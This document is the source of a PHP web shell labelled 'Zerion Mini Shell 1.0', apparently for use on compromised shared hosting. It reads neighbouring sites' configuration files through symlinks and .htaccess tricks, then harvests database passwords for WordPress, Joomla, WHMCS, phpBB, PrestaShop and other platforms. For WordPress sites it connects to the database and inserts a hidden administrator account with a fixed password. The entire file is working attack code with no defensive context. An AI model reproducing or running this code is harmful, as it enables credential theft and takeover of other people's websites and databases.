Mini Shell
<?php
ini_set('max_execution_time', 0);
$azerty = $_SERVER["SERVER_NAME"];
$abcd = dirname($_SERVER["PHP_SELF"]) ;
$url = $azerty.$abcd;
$dirname = dirname(__FILE__);
if (isset($_GET['config'])){
echo "<br><h4>Grabber link</h4><form method='post'>
<input placeholder='www.domains.com' style=' width: 265px; ' value='http://$url/sym/' type='text' name='config'><br><br>
<input type='submit' name='ch'></form>";
if($_POST['ch']){
$url = $_POST['config']; //$.......
$st = curl_init();
curl_setopt($st,CURLOPT_URL,$url);
curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
$get2 = curl_exec($st); // $.....
curl_close($st);
preg_match_all('#<a href="(.*?)"#', $get2, $config);
foreach($config[1] as $don){
echo "$don<br>";
}
}
}
if(isset($_GET['wp'])) {
echo"<br><h4><a href='log.txt' target='_blank' style='text-decoration: blink;'></a></h4><form method='post' enctype='multipart/form-data'>
<div style=' margin-left: -75px; '><span>Dir confige : </span> <input style=' width: 300px; ' type='text' name='domain' value='http://$url/sym/'><br><br></div>
<input style=' width: 300px; ' type='text' name='id' value='96739691'><br><br></div>
<div style=' margin-left: -75px; '><span>chdir folder : </span> <input style=' width: 300px; ' type='text' name='chdirr' value='$dirname/sym/'><br><br></div>
<div style=' margin-left: -75px; '><span>open folder : </span> <input style=' width: 300px; ' type='text' name='mkdir' value='bypass'><br></div>
<br><br>
<br><textarea style='width: 285px; height: 300px;' name='config'></textarea><br><br>
<input name='ppp' value='submit' type='submit'>
<br>
</form>";
if (isset($_POST['ppp'])){
$mkdir = $_POST['mkdir'];
$chdir = $_POST['chdirr'];
$dexter = $_POST['domain'];
$config = $_POST['config'];
$id= $_POST['id'];
//@mkdir($mkdir);
$ex=explode("\r\n",$config);
$total = count($ex);
echo "Total : <font color = 'red'>$total</font><br><br>";
foreach($ex as $azzouz)
{
chdir($chdir);
$h = fopen('.htaccess','w');
$d = "Options all
ReadmeName ".$azzouz;
$folder = $mkdir."/".$azzouz;
echo "<a href='$folder' target='_blank' color='gren' style='text-decoration: blink;'>$azzouz</a>";
fwrite($h,$d);
fclose($h);
$url = $dexter.$azzouz; //$.......
$st = curl_init();
curl_setopt($st,CURLOPT_URL,$url);
curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
$get = curl_exec($st); // $.....
curl_close($st);
/*
preg_match_all(" #'DB_HOST', '(.*?)'# ", $get, $host);
foreach($host[1] as $don){
$host = $don;
}
preg_match_all(" #'DB_PASSWORD', '(.*?)'# ", $get, $pass);
foreach($pass[1] as $done){
$pass = $done;
}
preg_match_all(" #'DB_USER', '(.*?)'# ", $get, $user);
foreach($user[1] as $done1){
$user = $done1;
}
preg_match_all(" #'DB_NAME', '(.*?)'# ", $get, $name);
foreach($name[1] as $done2){
$name = $done2;
}
preg_match_all("#$table_prefix = '(.*?)'#", $get, $prefix);
foreach($prefix[1] as $done3){
$prefix = $done3;
}*/
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b1);
$name=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b2);
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b3);
$pass=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$get,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$get,$b5);
$prefix=$b5[1][0];
//echo $host.$user.$pass.$name."</br>";
if($host=='DB_CHARSET'){
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\"(.*)\".*\).*;|isU',$get,$b1);
$name=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\"(.*)\".*\).*;|isU',$get,$b2);
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\"(.*)\".*\).*;|isU',$get,$b3);
$pass=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\"(.*)\".*\).*;|isU',$get,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$get,$b5);
$prefix=$b5[1][0];
}
$data = "/** MySQL database */
define('DB_NAME', '$name');
/** MySQL database username */
define('DB_USER', '$user');
/** MySQL database password */
define('DB_PASSWORD', '$pass');
/** MySQL hostname */
define('DB_HOST', '$host');
/** MySQL prefix */
\$table_prefix = '$prefix';
";
$kharya = "<br><br>
<div style='font-size: 15px;font-family: Verdana, sans-serif;'>
<span>database : <font color='#F31414'>$name</font></span><br>
<span>username : <font color='#F31414'>$user</font></span><br>
<span>password : <font color='#F31414'>$pass</font></span><br>
<span>hostname : <font color='#F31414'>$host</font></span><br>
<span>prefix : <font color='#F31414'>$prefix</font></span><br>
</div>";
$connect = mysqli_connect($host,$user,$pass,$name);
//$P$BWIuc67Oggh9uevHuilX8MxXmeW.HX/;
if($connect){
$query1 = mysqli_query($connect,"select * from ".$prefix."options where option_name='siteurl'");
while($siteurl = mysqli_fetch_array($query1)){
$site_url = $siteurl['option_value'];
}
//
$req = 'INSERT INTO `'.$prefix.'users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (\'server\', \'$P$BilbZtcH3ZicQk6aKpJQkECJPSVSnn.\', \'server\', \'server@localhost.com\', \''.$site_url.'\', \'2014-07-01 00:00:00\', \'\', \'0\', \'host\');
INSERT INTO `'.$prefix.'usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, LAST_INSERT_ID(), \''.$prefix.'capabilities\', \'a:1:{s:13:"administrator";s:1:"1";}\');
INSERT INTO `'.$prefix.'usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, LAST_INSERT_ID(), \''.$prefix.'user_level\', \'10\'); update '.$prefix.'options set option_value=\'3178881530\' where option_name=\'admin_email_lifespan\'';
$query2 = @mysqli_multi_query($connect,$req) or print(mysqli_error($connect));
//
if($query2){
$input = array('#00FFFF','#F0FFFF','#000000','#0000FF','#D2691E','#00008B','#FF00FF','#FFA07A','#FF0000','#EEE8AA','#40E0D0','#F0E68C','#006400','#4169E1','#3CB371','#663399','#A52A2A','#CD853F','#F0E68C','#FF00FF','#228B22');
$rand_keys = array_rand($input, 2);
$random = $input[$rand_keys[0]];
$dfgh = "$site_url#server@F*uckYou\r\n";
echo $kharya;
echo "<div margin-top: 6px; style='font-size: 15px;line-height: 20px;'>
<font color='brown'>domains </font>: <a href='$site_url/wp-login.php' target='_blank' color='gren' style='text-decoration: blink;'>$site_url</a> <br>
<font color='green'>Username </font>: <font color='black'>server</font> <br>
<font color='hotpink'>Password </font>: <font color='red'>F*uckYou</font><br>
</div><br>";
$wpok .= $site_url.'</br>';
}
}
else {
echo $notlocal.'</br>';
echo '<br><br><font color="#F31414">Error</font><br><br>';
}
}
echo $wpok;
}
}
if (isset($_GET['pass'])){
echo"<br><h4>Grabber Password </a></h4><form method='post' enctype='multipart/form-data'>
<div style=' margin-left: -75px; '><span>Dir confige : </span> <input style=' width: 300px; ' type='text' name='domain' value='http://$url/sym/'><br><br></div>
<div style=' margin-left: -75px; '><span>chdir folder : </span> <input style=' width: 300px; ' type='text' name='chdirr' value='$dirname/sym/'><br><br></div></div>
rotinabox@hotmail.com<br>
<br><textarea style='width: 300px; height: 176px;' name='config'></textarea><br><br>
<input name='fghj' value='submit' type='submit'>
<br>
</form>";
if (isset($_POST['fghj'])){
$mkdir = $_POST['mkdir'];
$chdir = $_POST['chdirr'];
$dexter = $_POST['domain'];
$config = $_POST['config'];
//@mkdir($mkdir);
$ex=explode("\r\n",$config);
echo "Total : <font color = 'red'>".count($ex)."</font><br><br>";
foreach($ex as $azzouz){
chdir($chdir);
$h = fopen('.htaccess','w');
$d = "Options all
ReadmeName ".$azzouz;
fwrite($h,$d);
fclose($h);
$url = $dexter.$azzouz; //$.......
//echo $url;
$st = curl_init();
curl_setopt($st,CURLOPT_URL,$url);
curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
$cnurl = curl_exec($st); // $.....
curl_close($st);
preg_match('#\'DB_PASSWORD\', \'(.*)\'#',$cnurl,$m1); // wordpress
if(empty($m1)) preg_match('#\'DB_PASSWORD\', \"(.*)\"#',$cnurl,$m1); // wordpress
preg_match('#password = \'(.*)\'#',$cnurl,$m2); // joomla
preg_match('#ftp_pass = \'(.*)\'#',$cnurl,$m55); // joomla
preg_match('#proxy_pass = \'(.*)\'#',$cnurl,$m44); // joomla
preg_match('#smtppass = \'(.*)\'#',$cnurl,$m33); // joomla
preg_match('#password\'] = \'(.*)\'#',$cnurl,$m3); // vb
preg_match('#db_password = "(.*)"#',$cnurl,$m4); // whmcs
preg_match('#db_password = \'(.*)\'#',$cnurl,$m4); // whmcs
preg_match('#dbpass = "(.*)"#',$cnurl,$m5); // dbpass
preg_match('#password = \'(.*)\'#',$cnurl,$m6); // connnect.php
preg_match('#dbpasswd = \'(.*)\'#',$cnurl,$m8); // phpBB 3.0.x
preg_match('#password_localhost = "(.*)"#',$cnurl,$m9); // conexao.php
preg_match('#senha = "(.*)"#',$cnurl,$m10); // senha
$pass=explode("'_DB_PASSWD_', '",$cnurl); $pass=explode("');",$pass[1]);$pass=$pass[0]; //Prestashop
$pss=explode("'password' => '",$file[1]);$pss=explode("',",$pss[1]);$pss=$pss[0]; //drupal
if(!empty($m1[1])){ echo $m1[1]."<br>"; }
elseif(!empty($m2[1])){ echo $m2[1]."<br>"; }
elseif(!empty($m3[1])){ echo $m3[1]."<br>"; }
elseif(!empty($m55[1])){ echo $m55[1]."<br>"; }
elseif(!empty($m44[1])){ echo $m44[1]."<br>"; }
elseif(!empty($m33[1])){ echo $m33[1]."<br>"; }
elseif(!empty($m4[1])){ echo $m4[1]."<br>"; }
elseif(!empty($m5[1])){ echo $m5[1]."<br>"; }
elseif(!empty($m6[1])){ echo $m6[1]."<br>"; }
elseif(!empty($m7[1])){ echo $m7[1]."<br>"; }
elseif(!empty($m8[1])){ echo $m8[1]."<br>"; }
elseif(!empty($m9[1])){ echo $m9[1]."<br>"; }
elseif(!empty($pass)){ echo $pass."<br>"; }
elseif(!empty($pss)){ echo $pss."<br>"; }
elseif(!empty($m10[1])){ echo $m10[1]."<br>"; }
}
}
}
?>
Zerion Mini Shell 1.0